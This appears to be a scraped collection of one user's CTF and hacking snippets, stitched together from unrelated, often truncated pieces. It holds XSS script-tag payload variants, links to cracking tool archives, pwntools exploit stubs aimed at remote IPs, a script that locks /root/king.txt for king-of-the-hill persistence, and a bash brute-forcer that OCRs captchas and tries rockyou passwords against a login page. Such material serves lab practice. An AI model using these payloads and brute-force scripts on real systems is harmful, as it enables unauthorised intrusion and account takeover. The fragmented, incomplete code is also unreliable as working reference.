sharpicx

<!-- Source: https://www.openbugbounty.org/blog/ismailtsdln/everything-about-xss-is-in-this-source/ -->

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>

cracker tools by yildo
https://disk.yandex.com/d/thW70brYNCceoQ

RE Tools by A.v.i
https://mega.nz/file/oO4VSZCa#Sz0pJQSxi0DrUTxXQhw8SFpUNsYOKW9NnYllw91-PS4

malware analysis training
https://forum.tuts4you.com/files/file/1843-malware-analysis-training/

.net reversing

	# made by sharpicx
	from pwn import *

	exe = './server_hogwarts' # load the binary
	elf = context.binary = ELF(exe, checksec=True) # running the checksec

	conn = remote('192.168.59.12', 9898)
	context.log_level = 'debug' # debugging the code

	buffer = b"A" * 112 # buffer of the EIP

	from pwn import *

	exe = ELF('./sick_rop', checksec=True)
	context.log_level = 'debug'
	context.clear(arch='amd64')
	#conn = process('./sick_rop')

	conn = remote("159.65.30.174", 30446)

	# vars

	#! /bin/bash

	read -p 'nick: ' nick
	while true; do
	echo $nick > /root/king.txt
	chmod 400 /root/king.txt
	chattr +i /root/king.txt
	set -o noclobber /root/king.txt
	break
	done

	# coded by sharpicx
	# original writings

	export TERM='xterm-256color'
	export HISTFILE=~/.zsh_history
	export EDITOR='nvim'
	export TERMINAL='kitty'
	export BROWSER='google-chrome-stable'
	export MANPAGER="sh -c 'col -bx \| bat -l man -p'"

	# +400000 is defined when PIE enabled.
	from angr import *

	binary = "./pass"
	proj = Project("./pass")
	state = proj.factory.entry_state()
	simgr = proj.factory.simgr(state)
	find_addr = 0x00166f
	simgr.explore(find=find_addr+0x400000)

	#! /bin/bash

	function main() {
	wordlist=/opt/seclists/Passwords/Leaked-Databases/rockyou.txt
	username="admin"
	for password in $(cat $wordlist); do
	curl -s -o output.png -b cookies.txt -c cookies.txt "http://192.168.100.26/auth.php?generate_captcha=1"
	capca=$(tesseract ./output.png - --psm 6 \| tr -d '\n[[:space:]]')
	res=$(curl -so /dev/null 'http://192.168.100.26/auth.php' -c cookies.txt -b cookies.txt -d "username=${username}&password=${password}&captcha=${capca}" -L -w %{size_download})
	echo "testing: ${password}"

	vm() {
	echo "usage: vm [import\|delete\|start\|modify\|stop\|restart\|list\|running] <machineName>"
	case "$1" in
	"import")
	vboxmanage import "$2"
	;;
	"delete")
	vboxmanage unregistervm "$2" --delete
	;;
	"start")

	<?php
	class STEMBACTF
	{
	public $stemba;
	public $ctf;
	}
	$object = new STEMBACTF();
	$object->stemba = "shar";
	$object->ctf = &$object->stemba;
	$serialized = serialize($object);